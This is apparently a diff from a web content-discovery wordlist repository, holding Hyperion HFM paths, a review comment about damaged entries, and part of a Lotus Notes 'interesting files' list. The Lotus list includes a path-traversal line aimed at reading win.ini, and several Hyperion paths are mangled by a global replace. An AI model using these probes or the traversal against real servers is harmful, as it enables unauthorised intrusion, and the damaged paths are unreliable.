||||
/HFM/Data/ProcessSummaryColOptions.asp
|
||||
/HFM/Data/ProcessSummaryRowOptions.asp
|
||||
/HFM/Data/ProcessUserPreferences.asp
|
||||
/HFM/Data/ProcFlowHistory.asp
|
||||
/HFM/Data/ProcFlowManagement.asp
|
||||
/HFM/Data/ProcMgtCalcEPU.asp
|
||||
/HFM/Data/SubmissionPhase.asp
|
||||
/HFM/Data/SubmissionPhaseMbrSel.asp
|
||||
/HFM/Data/Transactions.asp
|
||||
/HFM/Data/UserPreferences.asp
|
||||
/HFM/Data/WDEFAddMember.asp
|
||||
/HFM/Data/WDEFColScript.asp
|
||||
/HFM/Data/WDEFConstants.asp
|
||||
/HFM/Data/wdefExcel.xslt
|
||||
/HFM/Data/WdefInterface.asp
|
||||
/HFM/Data/wdef_print.xslt
|
||||
/HFM/Data/wdef.xslt
|
||||
/HFM/Data/WebFormBuilder.asp
|
||||
/HFM/Data/WebFormCellProp.asp
|
||||
/HFM/Data/WebFormCellText.asp
|
||||
/HFM/Data/WebFormClientScript.asp
|
||||
/HFM/Data/WebFormGenerated.asp
|
||||
/HFM/Data/WebFormLineItems.asp
|
||||
/HFM/Data/WebFormProcessFDMLaunch.asp
|
||||
/HFM/Data/XMLDataGrid.asp
|
||||
/HFM/default.asp
|
||||
/HFM/DeleteApp
|
||||
/HFM/DeleteApp/DeleteApp.asp
|
||||
/HFM/DeleteApp/DisplayServers.asp
|
||||
/HFM/DeleteApp/ProcessDelete.asp
|
||||
/HFM/DocMgr
|
||||
/HFM/DocMgr/AddToFavorites.asp
|
||||
/HFM/DocMgr/AddToWorkspace.asp
|
||||
/HFM/DocMgr/DeleteItems.asp
|
||||
/HFM/DocMgr/DocMgr.asp
|
||||
/HFM/DocMgr/DocMgrCommon.asp
|
||||
/HFM/DocMgr/DocMgrConstants.asp
|
||||
/HFM/DocMgr/DocMgrDownloadDoc.asp
|
||||
/HFM/DocMgr/DocMgrSave2.asp
|
||||
/HFM/DocMgr/DocMgrSave.asp
|
||||
/HFM/DocMgr/DocMgrSaveGrid.asp
|
||||
/HFM/DocMgr/DocMgrSaveProcess.asp
|
||||
/HFM/DocMgr/DownloadItem.asp
|
||||
/HFM/DocMgr/ExtractItems.asp
|
||||
/HFM/DocMgr/Favorites.asp
|
||||
/HFM/DocMgr/FavoritesInclude.asp
|
||||
/HFM/DocMgr/Link.asp
|
||||
/HFM/DocMgr/LoadFiles_Add.asp
|
||||
/HFM/DocMgr/LoadFiles_Add_Process.asp
|
||||
/HFM/DocMgr/LoadFiles_Process.asp
|
||||
/HFM/DocMgr/NewFolder.asp
|
||||
/HFM/DocMgr/NewFolder_Process.asp
|
||||
/HFM/DocMgr/NewItem.asp
|
||||
/HFM/DocMgr/OpenItem.asp
|
||||
/HFM/DocMgr/OpenItemDirect.asp
|
||||
/HFM/DocMgr/RelatedContent.asp
|
||||
/HFM/DocMgr/RelatedContentXml.asp
|
||||
/HFM/DocMgr/TaskList.asp
|
||||
/HFM/Downloads
|
||||
/HFM/Downloads/j2re-1_3_1_04-windows-i586-i.exe
|
||||
/HFM/EIE
|
||||
/HFM/EIE/AccountCS2/HFM.xsl
|
||||
/HFM/EIE/ApplicationCS2/HFM.xsl
|
||||
/HFM/EIE/CASRedirector.asp
|
||||
/HFM/EIE/CESAgent.asp
|
||||
/HFM/EIE/CESMbrSel.asp
|
||||
/HFM/EIE/CESTask2/HFMTask.xslt
|
||||
/HFM/EIE/Configuration.xsd
|
||||
/HFM/EIE/ConsolidationMethod.xsd
|
||||
/HFM/EIE/ConsolMethodsCS2/HFM.xsl
|
||||
/HFM/EIE/Cube.xsd
|
||||
/HFM/EIE/CurrencyCS2/HFM.xsl
|
||||
/HFM/EIE/CustomCS2/HFM.xsl
|
||||
/HFM/EIE/DataBrokerListener.asp
|
||||
/HFM/EIE/Dimension4All.xslt
|
||||
/HFM/EIE/Dimension.xsd
|
||||
/HFM/EIE/EIEFunctions.asp
|
||||
/HFM/EIE/EIEListener.asp
|
||||
/HFM/EIE/EIERedirector.asp
|
||||
/HFM/EIE/EIERegisterApplication.asp
|
||||
/HFM/EIE/EntityCS2/HFM.xsl
|
||||
/HFM/EIE/GenericDimCS2/HFM.xsl
|
||||
/HFM/EIE//HFMAwbListener.asp
|
||||
/HFM/EIE//HFMOfficeProvider.xslt
|
||||
/HFM/EIE/HubProdNav.asp
|
||||
/HFM/EIE/ICPCS2/HFM.xsl
|
||||
/HFM/EIE/ManageSmartview.asp
|
||||
/HFM/EIE/ScenarioCS2/HFM.xsl
|
||||
/HFM/EIE/SmartViewProviderReg.asp
|
||||
/HFM/EIE/ValueCS2/HFM.xsl
|
||||
/HFM/ExtendedAnalytics
|
||||
/HFM/ExtendedAnalytics/ExtendedAnalytics.asp
|
||||
/HFM/favicon.ico
|
||||
/HFM/FileTransfer
|
||||
/HFM/FileTransfer/DownloadFile.asp
|
||||
/HFM/global.asa
|
||||
/HFM/GlobalNav
|
||||
/HFM/GlobalNav/DefaultGlobalNavContent.asp
|
||||
/HFM/GlobalNav/GlobalNav.asp
|
||||
/HFM/GlobalNav/GlobalNavContentSupport.asp
|
||||
/HFM/GlobalNav/GlobalNavInlineComponents.asp
|
||||
/HFM/GlobalNav//HFMStaticObjectList.xml
|
||||
/HFM/GlobalNav/XMLObjectPalette.asp
|
||||
/HFM/GlobalWorkspaceNav
|
||||
/HFM/GlobalWorkspaceNav/bpm
|
||||
/HFM/GlobalWorkspaceNav/bpm/conf
|
||||
/HFM/GlobalWorkspaceNav/bpm/conf//HFMConfig.xml
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/appcontainer
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/appcontainer/Adf.asp
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/prefs
|
||||
/HFM/GlobalWorkspaceNav/bpm/modules/com/hyperion//HFM/web/prefs/Adf.asp
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/da
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/de
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/en
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/es
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/fr
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/it
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/ja
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/ko
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/ru
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/sv
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/tr
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/zh-CN
|
||||
/HFM/GlobalWorkspaceNav/bpm/resources/zh-TW
|
||||
/HFM/GlobalWorkspaceNav/DefaultGlobalNavContent.asp
|
||||
/HFM/GlobalWorkspaceNav/GlobalNav.asp
|
||||
/HFM/GlobalWorkspaceNav/GlobalNavContentSupport.asp
|
||||
/HFM/GlobalWorkspaceNav/GlobalNavInlineComponents.asp
|
||||
/HFM/GlobalWorkspaceNav//HFMStaticObjectList.xml
|
||||
/HFM/GlobalWorkspaceNav/ProcessCloseApp.asp
|
||||
/HFM/GlobalWorkspaceNav/UserAppPrefs.asp
|
||||
/HFM/GlobalWorkspaceNav/UserPreferences.asp
|
||||
/HFM/GlobalWorkspaceNav/XMLObjectPalette.asp
|
||||
/HFM//HFMOfficeProviderSetup
|
||||
/HFM//HFMOfficeProviderSetup//HFMOfficeProviderSetup.msi
|
||||
/HFM//HFMOfficeProviderSetup/Launch/HFMOfficeProviderSetup.vbs
|
||||
/HFM//HFMOfficeProviderSetup/setup.exe
|
||||
/HFM/Home
|
||||
/HFM/Home/About/HFM.asp
|
||||
/HFM/Home/AdminHome.asp
|
||||
/HFM/Home/CustomUI.asp
|
||||
/HFM/Home/Home.asp
|
||||
/HFM/Home/LaunchPage.asp
|
||||
/HFM/Home/MakeDefault.asp
|
||||
/HFM/Home/MakeDefaultConstants.asp
|
||||
/HFM/Home/MakeDefaultFunctions.asp
|
||||
/HFM/Home/NewHome.asp
|
||||
/HFM/Home/ProductRedirect.asp
|
||||
/HFM/Home/ProductWindow.asp
|
||||
/HFM/Home/Report_Error.asp
|
||||
/HFM/Home/ReportForward.asp
|
||||
/HFM/Home/ReportWindow.asp
|
||||
/HFM/Images
|
||||
/HFM/Images/bnr_about.bmp
|
||||
/HFM/Images/btn_process_1.bmp
|
||||
/HFM/Images/btn_process_2.bmp
|
||||
/HFM/Images/btn_process_3.bmp
|
||||
/HFM/Images/btn_process_4.bmp
|
||||
/HFM/Images/btn_process_5.bmp
|
||||
/HFM/Images/CROSS01.CUR
|
||||
/HFM/Images/CROSS02.CUR
|
||||
/HFM/Images/CROSS03.CUR
|
||||
/HFM/Images/CROSS04.CUR
|
||||
/HFM/Images/horznav_lev0_sel_pic_0.psd
|
||||
/HFM/Images/journal1.bmp
|
||||
/HFM/Images/journal2.bmp
|
||||
/HFM/Images/MAIL.BMP
|
||||
/HFM/IntercompanyTransactions
|
||||
/HFM/IntercompanyTransactions/AsyncIctAlert.asp
|
||||
/HFM/IntercompanyTransactions/AutoMatch.asp
|
||||
/HFM/IntercompanyTransactions/DrillDownTransactionReport.asp
|
||||
/HFM/IntercompanyTransactions/ICAlertOptions.asp
|
||||
/HFM/IntercompanyTransactions/ICMDrillDownTransactionReport.asp
|
||||
/HFM/IntercompanyTransactions/ICMonitorDetail.asp
|
||||
/HFM/IntercompanyTransactions/ICMonitorDetails.xsl
|
||||
/HFM/IntercompanyTransactions/ICMonitorReport.asp
|
||||
/HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.asp
|
||||
/HFM/IntercompanyTransactions/ICOpenClosePeriodStatus.xsl
|
||||
/HFM/IntercompanyTransactions/ICReports.xsl
|
||||
/HFM/IntercompanyTransactions/ICTransactionsColumnFilter.asp
|
||||
/HFM/IntercompanyTransactions/ICTransactionsCommon.asp
|
||||
/HFM/IntercompanyTransactions/ICTransActionStatus.asp
|
||||
/HFM/IntercompanyTransactions/ICTransactionSummary.asp
|
||||
/HFM/IntercompanyTransactions/ICTransColumnFilter.xsl
|
||||
/HFM/IntercompanyTransactions/ICTransMatchingReportGeneral.asp
|
||||
/HFM/IntercompanyTransactions/ICTReportProcessor.asp
|
||||
/HFM/IntercompanyTransactions/LoadTransactions.xsl
|
||||
/HFM/IntercompanyTransactions/LockUnlockEntities.asp
|
||||
/HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.asp
|
||||
/HFM/IntercompanyTransactions/LockUnlockEntitiesStatus.xsl
|
||||
/HFM/IntercompanyTransactions/LockUnlockEntities.xsl
|
||||
/HFM/IntercompanyTransactions/ManageICPeriods.asp
|
||||
/HFM/IntercompanyTransactions/ManageICPeriods.xsl
|
||||
/HFM/IntercompanyTransactions/ManageReasonCodes.asp
|
||||
/HFM/IntercompanyTransactions/ManageReasonCodes.xsl
|
||||
/HFM/IntercompanyTransactions/ManualMatchStatus.asp
|
||||
/HFM/IntercompanyTransactions/MonitorICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/MonitorICTrans.xsl
|
||||
/HFM/IntercompanyTransactions/MultiICTReportProcessor.asp
|
||||
/HFM/IntercompanyTransactions/NewEditICTransaction.asp
|
||||
/HFM/IntercompanyTransactions/ProcessICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/ProcessICTrans.xsl
|
||||
/HFM/IntercompanyTransactions/ProcessTransAction.xsl
|
||||
/HFM/IntercompanyTransactions/ReportByAcct.asp
|
||||
/HFM/IntercompanyTransactions/ReportByID.asp
|
||||
/HFM/IntercompanyTransactions/ReportHeader.xsl
|
||||
/HFM/IntercompanyTransactions/ReportSection.xsl
|
||||
/HFM/IntercompanyTransactions/SetICReasonCodes.asp
|
||||
/HFM/IntercompanyTransactions/UnmatchICTransactions.asp
|
||||
/HFM/IntercompanyTransactions/UnmatchICTransactions.xsl
|
||||
/HFM/IntercompanyTransactions/XslObjects.asp
|
||||
/HFM/Java
|
||||
/HFM/Java/classes
|
||||
/HFM/Java/classes//HFMJavaWebComponents.jar
|
||||
/HFM/Java/classes/xerces
|
||||
/HFM/Java/classes/xerces/xercesImpl.jar
|
||||
/HFM/Java/classes/xerces/xmlParserAPIs.jar
|
||||
/HFM/Journals
|
||||
/HFM/Journals//HFM_PrintSingleJournal.xsl
|
||||
/HFM/Journals//HFM_PrintSingleTemplate.xsl
|
||||
/HFM/Journals/JournalEntry.asp
|
||||
/HFM/Journals/Journals2.asp
|
||||
/HFM/Journals/JournalsAction.asp
|
||||
/HFM/Journals/JournalsCommon.asp
|
||||
/HFM/Journals/JournalsDefColumns.asp
|
||||
/HFM/Journals/JournalsDefFilter.asp
|
||||
/HFM/Journals/JournalsDefProperties.asp
|
||||
/HFM/Journals/JournalsMain.asp
|
||||
/HFM/Journals/JournalsNew.asp
|
||||
/HFM/Journals/ManageGroups.asp
|
||||
/HFM/Journals/ManagePeriods.asp
|
||||
/HFM/Journals/OpenJournal.asp
|
||||
/HFM/Journals/OpenTemplate.asp
|
||||
/HFM/Journals/PrintSingleJournal.asp
|
||||
/HFM/Journals/ProcessFilterGetEntity.asp
|
||||
/HFM/Journals/ProcessJournalEntry.asp
|
||||
/HFM/Journals/ProcessJournalsPOV.asp
|
||||
/HFM/Journals/ProcessJournalsQueryDef.asp
|
||||
/HFM/Journals/ProcessLIPOVJournals.asp
|
||||
/HFM/Journals/ProcessManagePeriods.asp
|
||||
/HFM/Journals/ProcessMbrSelClickMain.asp
|
||||
/HFM/Journals/ProcessPOVForGeneration.asp
|
||||
/HFM/Journals/ProcessTemplateEntry.asp
|
||||
/HFM/Journals/QueryDef.asp
|
||||
/HFM/Journals/TemplateEntry.asp
|
||||
/HFM/Journals/TemplatesAction.asp
|
||||
/HFM/Journals/TemplatesMain.asp
|
||||
/HFM/Journals/TemplatesNew.asp
|
||||
/HFM/LoadExtract
|
||||
/HFM/LoadExtract/downloadictlog.asp
|
||||
/HFM/LoadExtract/ExtractData.asp
|
||||
/HFM/LoadExtract/ExtractJournals.asp
|
||||
/HFM/LoadExtract/ExtractMemberLists.asp
|
||||
/HFM/LoadExtract/ExtractMetaData.asp
|
||||
/HFM/LoadExtract/ExtractRules.asp
|
||||
/HFM/LoadExtract/ExtractSecurity.asp
|
||||
/HFM/LoadExtract/ExtractTransactions.asp
|
||||
/HFM/LoadExtract/HsvJSConstantsServer_LoadExtract.asp
|
||||
/HFM/LoadExtract/loaddata.asp
|
||||
/HFM/LoadExtract/LoadJournals.asp
|
||||
/HFM/LoadExtract/LoadMemberLists.asp
|
||||
/HFM/LoadExtract/loadmeta.asp
|
||||
/HFM/LoadExtract/loadmeta_options.asp
|
||||
/HFM/LoadExtract/LoadRules.asp
|
||||
/HFM/LoadExtract/LoadSecurity.asp
|
||||
/HFM/LoadExtract/LoadTransactions.asp
|
||||
/HFM/LoadExtract/ProcessExtractJournals.asp
|
||||
/HFM/LoadExtract/ProcessExtractMemberlists.asp
|
||||
/HFM/LoadExtract/ProcessExtractMetaData.asp
|
||||
/HFM/LoadExtract/ProcessExtractRules.asp
|
||||
/HFM/LoadExtract/ProcessExtractSecurity.asp
|
||||
/HFM/LoadExtract/processExtractTransactions.asp
|
||||
/HFM/LoadExtract/ProcessJournalsExtractTree.asp
|
||||
/HFM/LoadExtract/ProcessLoadData.asp
|
||||
/HFM/LoadExtract/ProcessLoadJournals.asp
|
||||
/HFM/LoadExtract/ProcessLoadMemberLists.asp
|
||||
/HFM/LoadExtract/ProcessLoadRules.asp
|
||||
/HFM/LoadExtract/ProcessLoadSecurity.asp
|
||||
/HFM/LoadExtract/ProcessLoadTransactions.asp
|
||||
/HFM/LoadExtract/ProcessTransactionsExtractTree.asp
|
||||
/HFM/Logon
|
||||
/HFM/Logon/AuthenticateUser.asp
|
||||
/HFM/Logon/Logoff.asp
|
||||
/HFM/Logon/ProcessLogoff.asp
|
||||
/HFM/Logon/ProcessLogon.asp
|
||||
/HFM/Logon/SSO.asp
|
||||
/HFM/MbrSel
|
||||
/HFM/MbrSel/MbrSel.asp
|
||||
/HFM/MbrSel/MbrSel_Include.asp
|
||||
/HFM/MbrSel/MbrSel_Test.asp
|
||||
/HFM/MbrSel/MbrSelXml.asp
|
||||
/HFM/OpenApp
|
||||
/HFM/OpenApp/appopen.asp
|
||||
/HFM/OpenApp/CloseApp.asp
|
||||
/HFM/OpenApp/CloseApplication.asp
|
||||
/HFM/OpenApp/DisplayServers.asp
|
||||
/HFM/OpenApp/HsvJSConstantsServer_OpenApp.asp
|
||||
/HFM/OpenApp/OpenAppDirect.asp
|
||||
/HFM/OpenApp/ReopenAppDirect.asp
|
||||
/HFM/OpenApp/SelectApp.asp
|
||||
/HFM/OpenApp/SelectServer.asp
|
||||
/HFM/OpenApp/ServerStatus.asp
|
||||
/HFM/OpenApp/StartPage.asp
|
||||
/HFM/OwnershipManagement
|
||||
/HFM/OwnershipManagement/DisplayColumns.asp
|
||||
/HFM/OwnershipManagement/EPUFilterOptions.asp
|
||||
/HFM/OwnershipManagement/EPUReport.asp
|
||||
/HFM/OwnershipManagement/EPU_Report.xsl
|
||||
/HFM/OwnershipManagement/EPU.xsl
|
||||
/HFM/OwnershipManagement/ManageEPU.asp
|
||||
/HFM/OwnershipManagement/OwnershipManagement.asp
|
||||
/HFM/OwnershipManagement/ProcessCalcEPU.asp
|
||||
/HFM/OwnershipManagement/ProcessSharesCalculation.asp
|
||||
/HFM/OwnershipManagement/SharesCalculation.asp
|
||||
/HFM/POV
|
||||
/HFM/POV/POVCommon.asp
|
||||
/HFM/POV/povfinishpage.asp
|
||||
/HFM/POV/POVRequestData.asp
|
||||
/HFM/POV/povstartpage.asp
|
||||
/HFM/ProcessManagement
|
||||
/HFM/ProcessManagement/ProcessFlowHistory.asp
|
||||
/HFM/ProcessManagement/ProcessFlowManagement.asp
|
||||
/HFM/ProcessManagement/ProcessFlowValidationDetail.asp
|
||||
/HFM/ProcessManagement/ProcessManagement.asp
|
||||
/HFM/ProcessManagement/ProcessManagementSummary.asp
|
||||
/HFM/Reports
|
||||
/HFM/Reports/AddICPAccount.asp
|
||||
/HFM/Reports/checkStatus.asp
|
||||
/HFM/Reports/DynamicICP.asp
|
||||
/HFM/Reports/EditReport.asp
|
||||
/HFM/Reports/HsvJSConstantsServer_Reports.asp
|
||||
/HFM/Reports/ICPCommon.asp
|
||||
/HFM/Reports/ICPReportBuilder.asp
|
||||
/HFM/Reports/ICPReports.asp
|
||||
/HFM/Reports/OpenLocalReports.asp
|
||||
/HFM/Reports/OpenRemoteReport.asp
|
||||
/HFM/Reports/OpenRemoteReports.asp
|
||||
/HFM/Reports/PrintJournalReportOverride.asp
|
||||
/HFM/Reports/PrintReports.asp
|
||||
/HFM/Reports/ProcessICPGetEntity.asp
|
||||
/HFM/Reports/ProcessICPPOV.asp
|
||||
/HFM/Reports/ProcessICPReports.asp
|
||||
/HFM/Reports/ProcessJournalReports.asp
|
||||
/HFM/Reports/ProcessJournalReportsPov.asp
|
||||
/HFM/Reports/ProcessOpenLocalReports.asp
|
||||
/HFM/Reports/ReportFormatOptions.asp
|
||||
/HFM/Reports/SaveJournalReportLocal.asp
|
||||
/HFM/Reports/SaveLocal.asp
|
||||
/HFM/Security
|
||||
/HFM/Security/bpm
|
||||
/HFM/Security/bpm/asp
|
||||
/HFM/Security/bpm/asp/tree.asp
|
||||
/HFM/Security/bpm/BpmLauncher.asp
|
||||
/HFM/Security/bpm/BpmLauncher.xml
|
||||
/HFM/Security/bpm/BpmUi_Version.xml
|
||||
/HFM/Security/bpm/conf
|
||||
/HFM/Security/bpm/conf/BpmContextConfig.xml
|
||||
/HFM/Security/bpm/conf/BpmContextConfig.xsd
|
||||
/HFM/Security/bpm/conf/BpmDebugConfig.xml
|
||||
/HFM/Security/bpm/conf/BpmReleaseConfig.xml
|
||||
/HFM/Security/bpm/conf//HFMConfig.xml
|
||||
/HFM/Security/bpm/launcher.asp
|
||||
/HFM/Security/bpm/modules
|
||||
/HFM/Security/bpm/modules/com
|
||||
/HFM/Security/bpm/modules/com/hyperion
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/containers/wizard/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header
|
||||
/HFM/Security/bpm/modules/com/hyperion/bpm/web/desktop/header/header.inc
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/appcontainer/Adf.asp
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs
|
||||
/HFM/Security/bpm/modules/com/hyperion//HFM/web/prefs/Adf.asp
|
||||
/HFM/Security/bpm/resources
|
||||
/HFM/Security/conf
|
||||
/HFM/Security/conf//HFMConfig.xml
|
||||
/HFM/Security/createSecurityClass.asp
|
||||
/HFM/Security/deleteSecurityClass.asp
|
||||
/HFM/Security/GetClasses.asp
|
||||
/HFM/Security/getRightsAndRoles.asp
|
||||
/HFM/Security/getRights.asp
|
||||
/HFM/Security/getRoles.asp
|
||||
/HFM/Security/GetUsers.asp
|
||||
/HFM/Security/getUsersInGroup.asp
|
||||
/HFM/Security/modules
|
||||
/HFM/Security/modules/com
|
||||
/HFM/Security/modules/com/hyperion
|
||||
/HFM/Security/modules/com/hyperion//HFM
|
||||
/HFM/Security/modules/com/hyperion//HFM/web
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/appnode
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/appnode/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/AssignRights.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xml
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/assign/DataSet.xsd
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/classes/Classes.xsd
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserGroupHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsAndRolesHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRightsHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesCSV.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/report/UserRolesHTML.xsl
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users/Adf.asp
|
||||
/HFM/Security/modules/com/hyperion//HFM/web/security/users/Users.xsd
|
||||
/HFM/Security/olapsample.csv
|
||||
/HFM/Security/saveAsCsv.asp
|
||||
/HFM/Security/saveRights.asp
|
||||
/HFM/Security/securityAssignmentWizard.asp
|
||||
/HFM/Security/setSelectedClasses.asp
|
||||
/HFM/Security/setSelectedUsers.asp
|
||||
/HFM/Security/TestSecurityHarness.asp
|
||||
/HFM/ThirdParty
|
||||
/HFM/ThirdParty/Bindows
|
||||
/HFM/ThirdParty/Bindows/html
|
||||
/HFM/ThirdParty/Bindows/html/bimain.html
|
||||
/HFM/ThirdParty/Bindows/html/BiWsdlBuiltinTypes.xsd
|
||||
/HFM/ThirdParty/Bindows/html/blank.html
|
||||
/HFM/Workspace
|
||||
/HFM/Workspace/EmptyWorkspace.asp
|
||||
/HFM/Workspace/Preferences.asp
|
||||
/HFM/Workspace/Workspace.asp
|
||||
/HFM/Workspace/WorkspaceCommon.asp
|
||||
/HFM/Workspace/WorkspaceFlow.asp
|
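Review bot: several entries in interesting-files-hyperion.txt look damaged by a global replace of "HFM" with "/HFM", for example `/HFM/Central/Util//HFMCentralConstants.asp`, `/HFM/Central/Util/Launch/HFM.asp` and `/HFM/Home/About/HFM.asp`. The doubled slash, and file names split into an extra path segment (the same pattern shows in the `/HFM/EIE/...CS2/HFM.xsl` entries and under `/HFM//HFMOfficeProviderSetup`), mean these lines probably no longer name the files they were meant to. Please check them against the list this file was generated from and restore the unsplit names, or note in the commit message that the doubled slashes are intentional.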
344
discovery/generic/interesting-files-lotus-notes.txt
Normal file
|
@ -0,0 +1,344 @@
|
|||
/852566C90012664F
|
||||
/admin4.nsf
|
||||
/admin5.nsf
|
||||
/admin.nsf
|
||||
/agentrunner.nsf
|
||||
/alog.nsf
|
||||
/a_domlog.nsf
|
||||
/bookmark.nsf
|
||||
/busytime.nsf
|
||||
/catalog.nsf
|
||||
/certa.nsf
|
||||
/certlog.nsf
|
||||
/certsrv.nsf
|
||||
/chatlog.nsf
|
||||
/clbusy.nsf
|
||||
/cldbdir.nsf
|
||||
/clusta4.nsf
|
||||
/collect4.nsf
|
||||
/da.nsf
|
||||
/dba4.nsf
|
||||
/dclf.nsf
|
||||
/DEASAppDesign.nsf
|
||||
/DEASLog01.nsf
|
||||
/DEASLog02.nsf
|
||||
/DEASLog03.nsf
|
||||
/DEASLog04.nsf
|
||||
/DEASLog05.nsf
|
||||
/DEASLog.nsf
|
||||
/decsadm.nsf
|
||||
/decslog.nsf
|
||||
/DEESAdmin.nsf
|
||||
/dirassist.nsf
|
||||
/doladmin.nsf
|
||||
/domadmin.nsf
|
||||
/domcfg.nsf
|
||||
/domguide.nsf
|
||||
/domlog.nsf
|
||||
/dspug.nsf
|
||||
/events4.nsf
|
||||
/events5.nsf
|
||||
/events.nsf
|
||||
/event.nsf
|
||||
/homepage.nsf
|
||||
/iNotes/Forms5.nsf/$DefaultNav
|
||||
/jotter.nsf
|
||||
/leiadm.nsf
|
||||
/leilog.nsf
|
||||
/leivlt.nsf
|
||||
/log4a.nsf
|
||||
/log.nsf
|
||||
/l_domlog.nsf
|
||||
/mab.nsf
|
||||
/mail10.box
|
||||
/mail1.box
|
||||
/mail2.box
|
||||
/mail3.box
|
||||
/mail4.box
|
||||
/mail5.box
|
||||
/mail6.box
|
||||
/mail7.box
|
||||
/mail8.box
|
||||
/mail9.box
|
||||
/mail.box
|
||||
/msdwda.nsf
|
||||
/mtatbls.nsf
|
||||
/mtstore.nsf
|
||||
/names.nsf
|
||||
/nntppost.nsf
|
||||
/nntp/nd000001.nsf
|
||||
/nntp/nd000002.nsf
|
||||
/nntp/nd000003.nsf
|
||||
/ntsync45.nsf
|
||||
/perweb.nsf
|
||||
/qpadmin.nsf
|
||||
/quickplace/quickplace/main.nsf
|
||||
/reports.nsf
|
||||
/sample/siregw46.nsf
|
||||
/schema50.nsf
|
||||
/setupweb.nsf
|
||||
/setup.nsf
|
||||
/smbcfg.nsf
|
||||
/smconf.nsf
|
||||
/smency.nsf
|
||||
/smhelp.nsf
|
||||
/smmsg.nsf
|
||||
/smquar.nsf
|
||||
/smsolar.nsf
|
||||
/smtime.nsf
|
||||
/smtpibwq.nsf
|
||||
/smtpobwq.nsf
|
||||
/smtp.box
|
||||
/smtp.nsf
|
||||
/smvlog.nsf
|
||||
/srvnam.htm
|
||||
/statmail.nsf
|
||||
/statrep.nsf
|
||||
/stauths.nsf
|
||||
/stautht.nsf
|
||||
/stconfig.nsf
|
||||
/stconf.nsf
|
||||
/stdnaset.nsf
|
||||
/stdomino.nsf
|
||||
/stlog.nsf
|
||||
/streg.nsf
|
||||
/stsrc.nsf
|
||||
/userreg.nsf
|
||||
/vpuserinfo.nsf
|
||||
/webadmin.nsf
|
||||
/web.nsf
|
||||
/.nsf/../winnt/win.ini
|
||||
/?Open
|
||||
?Open
|
||||
?OpenServer
|
||||
AgentRunner.nsf
|
||||
DEASAppDesign.nsf
|
||||
DEASLog.nsf
|
||||
DEASLog01.nsf
|
||||
DEASLog02.nsf
|
||||
DEASLog03.nsf
|
||||
DEASLog04.nsf
|
||||
DEASLog05.nsf
|
||||
DEESAdmin.nsf
|
||||
a_domlog.nsf
|
||||
account.nsf
|
||||
accounts.nsf
|
||||
activity.nsf
|
||||
adm-bin/acls.exe
|
||||
